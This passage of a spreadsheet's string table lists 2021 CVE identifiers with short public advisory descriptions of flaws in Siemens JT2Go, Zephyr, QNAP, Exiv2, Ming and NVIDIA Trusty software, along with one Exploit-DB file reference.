    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Gif_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing GIF files. This could result in an out of bounds read past the end of an allocated buffer. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13023</t>
  </si>
  <si>
    <t>CVE-2021-34295</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Gif_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing GIF files. This could result in an out of bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13024)</t>
  </si>
  <si>
    <t>CVE-2021-34296</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The BMP_Loader.dll library in affected applications lacks proper validation of user-supplied data when parsing BMP files. This could result in an out of bounds read past the end of an allocated buffer. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13057)</t>
  </si>
  <si>
    <t>CVE-2021-34297</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The BMP_Loader.dll library in affected applications lacks proper validation of user-supplied data when parsing BMP files. This could result in an out of bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13059)</t>
  </si>
  <si>
    <t>CVE-2021-34298</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The BMP_Loader.dll library in affected applications lacks proper validation of user-supplied data prior to performing further free operations on an object when parsing BMP files. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13060)</t>
  </si>
  <si>
    <t>CVE-2021-34299</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Tiff_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing TIFF files. This could result in an out of bounds read past the end of an allocated buffer. An attacker could leverage this vulnerability to leak information in the context of the current process. (ZDI-CAN-13192)</t>
  </si>
  <si>
    <t>CVE-2021-3430</t>
  </si>
  <si>
    <t>Assertion reachable with repeated LL_CONNECTION_PARAM_REQ. Zephyr versions &gt;= v1.14 contain Reachable Assertion (CWE-617). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-46h3-hjcq-2jjr</t>
  </si>
  <si>
    <t>CVE-2021-34300</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Tiff_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing TIFF files. This could result in an out of bounds write past the end of an allocated buffer. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13194)</t>
  </si>
  <si>
    <t>CVE-2021-34301</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The BMP_Loader.dll library in affected applications lacks proper validation of user-supplied data prior to performing further free operations on an object when parsing BMP files. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13196)</t>
  </si>
  <si>
    <t>CVE-2021-34302</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The BMP_Loader.dll library in affected applications lacks proper validation of user-supplied data when parsing BMP files. This could result in an out of bounds read past the end of an allocated buffer. An attacker could leverage this vulnerability to leak information in the context of the current process. (ZDI-CAN-13197)</t>
  </si>
  <si>
    <t>CVE-2021-34303</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Tiff_Loader.dll library in affected applications lacks proper validation of user-supplied data when parsing TIFF files. This could result in an out of bounds read past the end of an allocated buffer. An attacker could leverage this vulnerability to leak information in the context of the current process. (ZDI-CAN-13198)</t>
  </si>
  <si>
    <t>CVE-2021-34304</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Tiff_Loader.dll library in affected applications lacks proper validation of user-supplied data when parsing TIFF files. This could result in an out of bounds read past the end of an allocated buffer. An attacker could leverage this vulnerability to leak information in the context of the current process. (ZDI-CAN-13199)</t>
  </si>
  <si>
    <t>CVE-2021-34305</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Gif_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing GIF files. This could result in an out of bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13340)</t>
  </si>
  <si>
    <t>CVE-2021-34306</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The BMP_Loader.dll library in affected applications lacks proper validation of user-supplied data when parsing BMP files. This could result in a memory corruption condition. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13342)</t>
  </si>
  <si>
    <t>CVE-2021-34307</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Tiff_Loader.dll library in affected applications lacks proper validation of user-supplied data when parsing TIFF files. This could result in an out of bounds read past the end of an allocated buffer. An attacker could leverage this vulnerability to leak information in the context of the current process. (ZDI-CAN-13343)</t>
  </si>
  <si>
    <t>CVE-2021-34308</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The BMP_Loader.dll library in affected applications lacks proper validation of user-supplied data when parsing BMP files. This could result in an out of bounds read past the end of an allocated buffer. An attacker could leverage this vulnerability to leak information in the context of the current process. (ZDI-CAN-13344)</t>
  </si>
  <si>
    <t>CVE-2021-34309</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Tiff_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing TIFF files. This could result in an out of bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13350)</t>
  </si>
  <si>
    <t>CVE-2021-3431</t>
  </si>
  <si>
    <t>Assertion reachable with repeated LL_FEATURE_REQ. Zephyr versions &gt;= v2.5.0 contain Reachable Assertion (CWE-617). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-7548-5m6f-mqv9</t>
  </si>
  <si>
    <t>CVE-2021-34310</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Tiff_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing TIFF files. This could result in an out of bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13351)</t>
  </si>
  <si>
    <t>CVE-2021-34311</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Mono_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing J2K files. This could result in an out of bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13352)</t>
  </si>
  <si>
    <t>CVE-2021-34312</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Tiff_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing TIFF files. This could result in an out of bounds write past the fixed-length heap-based buffer. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13353)</t>
  </si>
  <si>
    <t>CVE-2021-34313</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Tiff_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing TIFF files. This could result in an out of bounds write past the fixed-length heap-based buffer. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13354)</t>
  </si>
  <si>
    <t>CVE-2021-34314</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The BMP_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing SGI files. This could result in an out of bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13355)</t>
  </si>
  <si>
    <t>CVE-2021-34315</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The BMP_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing SGI files. This could result in an out of bounds read past the end of an allocated buffer. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13356)</t>
  </si>
  <si>
    <t>CVE-2021-34316</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The DL180CoolType.dll library in affected applications lacks proper validation of user-supplied data when parsing PDF files. This could result in an out of bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13380)</t>
  </si>
  <si>
    <t>CVE-2021-34317</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The BMP_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing PCX files. This could result in an out of bounds write past the fixed-length heap-based buffer. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13402)</t>
  </si>
  <si>
    <t>CVE-2021-34318</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The BMP_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing PCT files. This could result in an out of bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13403)</t>
  </si>
  <si>
    <t>CVE-2021-34319</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The BMP_loader.dll library in affected applications lacks proper validation of user-supplied data when parsing SGI files. This could result in an out of bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13404)</t>
  </si>
  <si>
    <t>CVE-2021-3432</t>
  </si>
  <si>
    <t>Invalid interval in CONNECT_IND leads to Division by Zero. Zephyr versions &gt;= v1.14.0 Divide By Zero (CWE-369). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-7364-p4wc-8mj4</t>
  </si>
  <si>
    <t>CVE-2021-34320</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Jt981.dll library in affected applications lacks proper validation of user-supplied data when parsing JT files. This could result in an out of bounds read past the end of an allocated buffer. An attacker could leverage this vulnerability to leak information in the context of the current process. (ZDI-CAN-13406)</t>
  </si>
  <si>
    <t>CVE-2021-34321</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The VisDraw.dll library in affected applications lacks proper validation of user-supplied data when parsing J2K files. This could result in an out of bounds read past the end of an allocated buffer. An attacker could leverage this vulnerability to leak information in the context of the current process. (ZDI-CAN-13414)</t>
  </si>
  <si>
    <t>CVE-2021-34322</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The JPEG2K_Loader.dll library in affected applications lacks proper validation of user-supplied data when parsing J2K files. This could result in an out of bounds read past the end of an allocated buffer. An attacker could leverage this vulnerability to leak information in the context of the current process. (ZDI-CAN-13416)</t>
  </si>
  <si>
    <t>CVE-2021-34323</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Jt981.dll library in affected applications lacks proper validation of user-supplied data when parsing JT files. This could result in an out of bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13419)</t>
  </si>
  <si>
    <t>CVE-2021-34324</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Jt981.dll library in affected applications lacks proper validation of user-supplied data prior to performing further free operations on an object when parsing JT files. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13420)</t>
  </si>
  <si>
    <t>CVE-2021-34325</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Jt981.dll library in affected applications lacks proper validation of user-supplied data when parsing JT files. This could result in an out of bounds read past the end of an allocated buffer. An attacker could leverage this vulnerability to leak information in the context of the current process. (ZDI-CAN-13421)</t>
  </si>
  <si>
    <t>CVE-2021-34326</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Solid Edge SE2021 (All Versions &lt; SE2021MP5), Teamcenter Visualization (All versions &lt; V13.2). The plmxmlAdapterSE70.dll library in affected applications lacks proper validation of user-supplied data when parsing PAR files. This could result in an out of bounds write past the fixed-length heap-based buffer. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13422)</t>
  </si>
  <si>
    <t>CVE-2021-34327</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Solid Edge SE2021 (All Versions &lt; SE2021MP5), Teamcenter Visualization (All versions &lt; V13.2). The plmxmlAdapterSE70.dll library in affected applications lacks proper validation of user-supplied data when parsing ASM files. This could result in an out of bounds write past the fixed-length heap-based buffer. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13423)</t>
  </si>
  <si>
    <t>CVE-2021-34328</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Solid Edge SE2021 (All Versions &lt; SE2021MP5), Teamcenter Visualization (All versions &lt; V13.2). The plmxmlAdapterSE70.dll library in affected applications lacks proper validation of user-supplied data when parsing PAR files. This could result in an out of bounds write past the fixed-length heap-based buffer. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13424)</t>
  </si>
  <si>
    <t>CVE-2021-34329</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Solid Edge SE2021 (All Versions &lt; SE2021MP5), Teamcenter Visualization (All versions &lt; V13.2). The plmxmlAdapterSE70.dll library in affected applications lacks proper validation of user-supplied data when parsing PAR files. This could result in an out of bounds write past the fixed-length heap-based buffer. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13427)</t>
  </si>
  <si>
    <t>CVE-2021-3433</t>
  </si>
  <si>
    <t>Invalid channel map in CONNECT_IND results to Deadlock. Zephyr versions &gt;= v2.5.0 Improper Check or Handling of Exceptional Conditions (CWE-703). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-3c2f-w4v6-qxrp</t>
  </si>
  <si>
    <t>CVE-2021-34330</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Jt981.dll library in affected applications lacks proper validation of user-supplied data prior to performing further free operations on an object when parsing JT files. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13430)</t>
  </si>
  <si>
    <t>CVE-2021-34331</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The Jt981.dll library in affected applications lacks proper validation of user-supplied data when parsing JT files. This could result in an out of bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-13442)</t>
  </si>
  <si>
    <t>CVE-2021-34332</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The BMP_Loader.dll library in affected applications lacks proper validation of user-supplied data when parsing BMP files. A malformed input file could result in an infinite loop condition that leads to denial of service condition. An attacker could leverage this vulnerability to consume excessive resources. (CNVD-C-2021-79300)</t>
  </si>
  <si>
    <t>CVE-2021-34333</t>
  </si>
  <si>
    <t>A vulnerability has been identified in JT2Go (All versions &lt; V13.2), Teamcenter Visualization (All versions &lt; V13.2). The BMP_Loader.dll library in affected applications lacks proper validation of user-supplied data when parsing BMP files. A malformed input file could result in double free of an allocated buffer that leads to a crash. An attacker could leverage this vulnerability to cause denial of service condition. (CNVD-C-2021-79295)</t>
  </si>
  <si>
    <t>CVE-2021-34334</t>
  </si>
  <si>
    <t>Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. An infinite loop is triggered when Exiv2 is used to read the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service, if they can trick the victim into running Exiv2 on a crafted image file. The bug is fixed in version v0.27.5.</t>
  </si>
  <si>
    <t>CVE-2021-34335</t>
  </si>
  <si>
    <t>Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. A floating point exception (FPE) due to an integer divide by zero was found in Exiv2 versions v0.27.4 and earlier. The FPE is triggered when Exiv2 is used to print the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service, if they can trick the victim into running Exiv2 on a crafted image file. Note that this bug is only triggered when printing the interpreted (translated) data, which is a less frequently used Exiv2 operation that requires an extra command line option (`-p t` or `-P t`). The bug is fixed in version v0.27.5.</t>
  </si>
  <si>
    <t>CVE-2021-34338</t>
  </si>
  <si>
    <t>Ming 0.4.8 has an out-of-bounds buffer overwrite issue in the function getName() in decompiler.c file that causes a direct segmentation fault and leads to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-34339</t>
  </si>
  <si>
    <t>Ming 0.4.8 has an out-of-bounds buffer access issue in the function getString() in decompiler.c file that causes a direct segmentation fault and leads to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-3434</t>
  </si>
  <si>
    <t>Stack based buffer overflow in le_ecred_conn_req(). Zephyr versions &gt;= v2.5.0 Stack-based Buffer Overflow (CWE-121). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-8w87-6rfp-cfrm</t>
  </si>
  <si>
    <t>CVE-2021-34340</t>
  </si>
  <si>
    <t>Ming 0.4.8 has an out-of-bounds buffer access issue in the function decompileINCR_DECR() in decompiler.c file that causes a direct segmentation fault and leads to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-34341</t>
  </si>
  <si>
    <t>Ming 0.4.8 has an out-of-bounds read vulnerability in the function decompileIF() in the decompile.c file that causes a direct segmentation fault and leads to denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-34342</t>
  </si>
  <si>
    <t>Ming 0.4.8 has an out-of-bounds read vulnerability in the function newVar_N() in decompile.c which causes a huge information leak.</t>
  </si>
  <si>
    <t>CVE-2021-34343</t>
  </si>
  <si>
    <t>A stack buffer overflow vulnerability has been reported to affect QNAP device running QTS, QuTScloud, QuTS hero. If exploited, this vulnerability allows attackers to execute arbitrary code. We have already fixed this vulnerability in the following versions of QTS, QuTScloud, QuTS hero: QTS 4.5.4.1715 build 20210630 and later QTS 5.0.0.1716 build 20210701 and later QuTScloud c4.5.6.1755 and later QuTS hero h4.5.4.1771 build 20210825 and later</t>
  </si>
  <si>
    <t>CVE-2021-34344</t>
  </si>
  <si>
    <t>A stack buffer overflow vulnerability has been reported to affect QNAP device running QUSBCam2. If exploited, this vulnerability allows attackers to execute arbitrary code. We have already fixed this vulnerability in the following versions of QUSBCam2: QTS 4.5.4: QUSBCam2 1.1.4 ( 2021/07/30 ) and later QTS 5.0: QUSBCam2 2.0.1 ( 2021/08/03 ) and later QTS 4.3.6: QUSBCam2 1.1.4 ( 2021/07/30 ) and later QTS 4.3.3: QUSBCam2 1.1.4 ( 2021/08/06 ) and later QuTS hero 4.5.3: QUSBCam2 1.1.4 ( 2021/07/30 ) and later</t>
  </si>
  <si>
    <t>CVE-2021-34345</t>
  </si>
  <si>
    <t>A stack buffer overflow vulnerability has been reported to affect QNAP device running NVR Storage Expansion. If exploited, this vulnerability allows attackers to execute arbitrary code. We have already fixed this vulnerability in the following versions of NVR Storage Expansion: NVR Storage Expansion 1.0.6 ( 2021/08/03 ) and later</t>
  </si>
  <si>
    <t>CVE-2021-34346</t>
  </si>
  <si>
    <t>CVE-2021-34348</t>
  </si>
  <si>
    <t>A command injection vulnerability has been reported to affect QNAP device running QVR. If exploited, this vulnerability could allow remote attackers to run arbitrary commands. We have already fixed this vulnerability in the following versions of QVR: QVR 5.1.5 build 20210803 and later</t>
  </si>
  <si>
    <t>CVE-2021-34349</t>
  </si>
  <si>
    <t>CVE-2021-3435</t>
  </si>
  <si>
    <t>Information leakage in le_ecred_conn_req(). Zephyr versions &gt;= v2.4.0 Use of Uninitialized Resource (CWE-908). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-xhg3-gvj6-4rqh</t>
  </si>
  <si>
    <t>CVE-2021-34351</t>
  </si>
  <si>
    <t>CVE-2021-34352</t>
  </si>
  <si>
    <t>A command injection vulnerability has been reported to affect QNAP device running QVR. If exploited, this vulnerability could allow remote attackers to run arbitrary commands. We have already fixed this vulnerability in the following versions of QVR: QVR 5.1.5 build 20210902 and later</t>
  </si>
  <si>
    <t>CVE-2021-34354</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability has been reported to affect QNAP device running Photo Station. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of Photo Station: Photo Station 6.0.18 ( 2021/09/01 ) and later</t>
  </si>
  <si>
    <t>CVE-2021-34355</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability has been reported to affect QNAP NAS running Photo Station. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of Photo Station: Photo Station 5.4.10 ( 2021/08/19 ) and later Photo Station 5.7.13 ( 2021/08/19 ) and later Photo Station 6.0.18 ( 2021/09/01 ) and later</t>
  </si>
  <si>
    <t>CVE-2021-34356</t>
  </si>
  <si>
    <t>CVE-2021-34357</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability has been reported to affect QNAP device running QmailAgent. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of QmailAgent: QmailAgent 3.0.2 ( 2021/08/25 ) and later</t>
  </si>
  <si>
    <t>CVE-2021-34358</t>
  </si>
  <si>
    <t>We have already fixed this vulnerability in the following versions of QmailAgent: QmailAgent 3.0.2 ( 2021/08/25 ) and later</t>
  </si>
  <si>
    <t>CVE-2021-34359</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability has been reported to affect QNAP device running Proxy Server. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of Proxy Server: QTS 4.5.x: Proxy Server 1.4.2 ( 2021/12/30 ) and later</t>
  </si>
  <si>
    <t>CVE-2021-3436</t>
  </si>
  <si>
    <t>BT: Possible to overwrite an existing bond during keys distribution phase when the identity address of the bond is known. Zephyr versions &gt;= 1.14.2, &gt;= 2.4.0, &gt;= 2.5.0 contain Use of Multiple Resources with Duplicate Identifier (CWE-694). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-j76f-35mc-4h63</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49991.txt</t>
  </si>
  <si>
    <t>Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)</t>
  </si>
  <si>
    <t>CVE-2021-34360</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) vulnerability has been reported to affect QNAP device running Proxy Server. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of Proxy Server: QTS 4.5.x: Proxy Server 1.4.2 ( 2021/12/30 ) and later QuTS hero h5.0.0: Proxy Server 1.4.3 ( 2022/01/18 ) and later QuTScloud c4.5.6: Proxy Server 1.4.2 ( 2021/12/30 ) and later</t>
  </si>
  <si>
    <t>CVE-2021-34361</t>
  </si>
  <si>
    <t>CVE-2021-34362</t>
  </si>
  <si>
    <t>A command injection vulnerability has been reported to affect QNAP device running Media Streaming add-on. If exploited, this vulnerability allow remote attackers to run arbitrary commands. We have already fixed this vulnerability in the following versions of Media Streaming add-on: QTS 5.0.0: Media Streaming add-on 500.0.0.3 ( 2021/08/20 ) and later QTS 4.5.4: Media Streaming add-on 500.0.0.3 ( 2021/08/20 ) and later QTS 4.3.6: Media Streaming add-on 430.1.8.12 ( 2021/08/20 ) and later QTS 4.3.3: Media Streaming add-on 430.1.8.12 ( 2021/09/29 ) and later QuTS-Hero 5.0.0: Media Streaming add-on 500.0.0.3 ( 2021/08/20 ) and later</t>
  </si>
  <si>
    <t>CVE-2021-34363</t>
  </si>
  <si>
    <t>The thefuck (aka The Fuck) package before 3.31 for Python allows Path Traversal that leads to arbitrary file deletion via the "undo archive operation" feature.</t>
  </si>
  <si>
    <t>CVE-2021-34364</t>
  </si>
  <si>
    <t>The Refined GitHub browser extension before 21.6.8 might allow XSS via a link in a document. NOTE: github.com sends Content-Security-Policy headers to, in general, address XSS and other concerns.</t>
  </si>
  <si>
    <t>CVE-2021-34369</t>
  </si>
  <si>
    <t>** DISPUTED ** portlets/contact/ref/refContactDetail.do in Accela Civic Platform through 20.1 allows remote attackers to obtain sensitive information via a modified contactSeqNumber value. NOTE: the vendor states "the information that is being queried is authorized for an authenticated user of that application, so we consider this not applicable."</t>
  </si>
  <si>
    <t>CVE-2021-34370</t>
  </si>
  <si>
    <t>** DISPUTED ** Accela Civic Platform through 20.1 allows ssoAdapter/logoutAction.do successURL XSS. NOTE: the vendor states "there are configurable security flags and we are unable to reproduce them with the available information."</t>
  </si>
  <si>
    <t>CVE-2021-34371</t>
  </si>
  <si>
    <t>Neo4j through 3.4.18 (with the shell server enabled) exposes an RMI service that arbitrarily deserializes Java objects, e.g., through setSessionVariable. An attacker can abuse this for remote code execution because there are dependencies with exploitable gadget chains.</t>
  </si>
  <si>
    <t>CVE-2021-34372</t>
  </si>
  <si>
    <t>Trusty (the trusted OS produced by NVIDIA for Jetson devices) driver contains a vulnerability in the NVIDIA OTE protocol message parsing code where an integer overflow in a malloc() size calculation leads to a buffer overflow on the heap, which might result in information disclosure, escalation of privileges, and denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-34373</t>
  </si>
  <si>
    <t>Trusty trusted Linux kernel (TLK) contains a vulnerability in the NVIDIA TLK kernel where a lack of heap hardening could cause heap overflows, which might lead to information disclosure and denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-34374</t>
  </si>
  <si>
    <t>Trusty contains a vulnerability in command handlers where the length of input buffers is not verified. This vulnerability can cause memory corruption, which may lead to information disclosure, escalation of privileges, and denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-34375</t>
  </si>
  <si>
    <t>Trusty contains a vulnerability in all trusted applications (TAs) where the stack cookie was not randomized, which might result in stack-based buffer overflow, leading to denial of service, escalation of privileges, and information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-34376</t>
  </si>
  <si>
    <t>Trusty contains a vulnerability in the HDCP service TA where bounds checking in command 5 is missing. Improper restriction of operations within the bounds of a memory buffer might lead to denial of service, escalation of privileges, and information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-34377</t>
  </si>
  <si>
    <t>Trusty contains a vulnerability in the HDCP service TA where bounds checking in command 9 is missing. Improper restriction of operations within the bounds of a memory buffer might lead to escalation of privileges, information disclosure, and denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-34378</t>
  </si>
  <si>
    <t>Trusty contains a vulnerability in the HDCP service TA where bounds checking in command 11 is missing. Improper restriction of operations within the bounds of a memory buffer might lead to information disclosure, denial of service, or escalation of privileges.</t>
  </si>
  <si>
    <t>CVE-2021-34379</t>
  </si>
  <si>
    <t>Trusty contains a vulnerability in the HDCP service TA where bounds checking in command 10 is missing. The length of an I/O buffer parameter is not checked, which might lead to memory corruption.</t>
  </si>
  <si>
    <t>CVE-2021-3438</t>
  </si>
  <si>
    <t>A potential buffer overflow in the software drivers for certain HP LaserJet products and Samsung product printers could lead to an escalation of privilege.</t>
  </si>
  <si>
    <t>CVE-2021-34380</t>
  </si>
  <si>
    <t>Bootloader contains a vulnerability in NVIDIA MB2 where potential heap overflow might cause corruption of the heap metadata, which might lead to arbitrary code execution, denial of service, and information disclosure during secure boot.</t>
  </si>
  <si>
    <t>CVE-2021-34381</t>
  </si>
  <si>
    <t>Trusty TLK contains a vulnerability in the NVIDIA TLK kernel function where a lack of checks allows the exploitation of an integer overflow on the size parameter of the tz_map_shared_mem function, which might lead to denial of service, information disclosure, or data tampering.</t>
  </si>
  <si>
    <t>CVE-2021-34382</t>
  </si>
  <si>
    <t>Trusty TLK contains a vulnerability in the NVIDIA TLK kernelâ€™s tz_map_shared_mem function where an integer overflow on the size parameter causes the request buffer and the logging buffer to overflow, allowing writes to arbitrary addresses within the kernel.</t>
  </si>
  <si>
    <t>CVE-2021-34383</t>
  </si>
  <si>
